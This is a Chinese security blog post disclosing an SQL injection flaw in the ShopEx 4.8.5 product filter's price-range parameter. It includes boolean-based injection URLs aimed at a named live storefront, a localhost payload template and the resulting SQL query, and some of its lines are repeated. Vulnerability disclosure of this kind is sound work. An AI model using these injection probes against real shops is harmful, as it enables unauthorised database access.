- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
漏洞提供者:蘑菇街
对漏洞提供者表示感谢。
涉及版本:shopex-single-4.8.5.80603是否需要登录:无需登录
是否默认配置:是有无利用代码:code
漏洞细节:
产品筛选页面 价格区间某处没有intval导致注入.
http://www.dynest.com/readme.txt 9月2号的补丁
漏洞细节:
产品筛选页面 价格区间某处没有intval导致注入.
http://www.dynest.com/readme.txt 9月2号的补丁
http://www.dynest.com/gallery–p,0,50%20and%200-0—1.html
没有产品
http://www.dynest.com/gallery–p,0,50%20and%201-0—1.html
返回正常
返回正常
http://localhost/gallery–p,0,50(SQL)-0—1.html
实际执行的SQL为 select DISTINCT goods_id from sdb_products where price >= 0 AND price <= 50(SQL) AND disabled = ‘false’ AND marketable=’true’
实际执行的SQL为 select DISTINCT goods_id from sdb_products where price >= 0 AND price <= 50(SQL) AND disabled = ‘false’ AND marketable=’true’
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
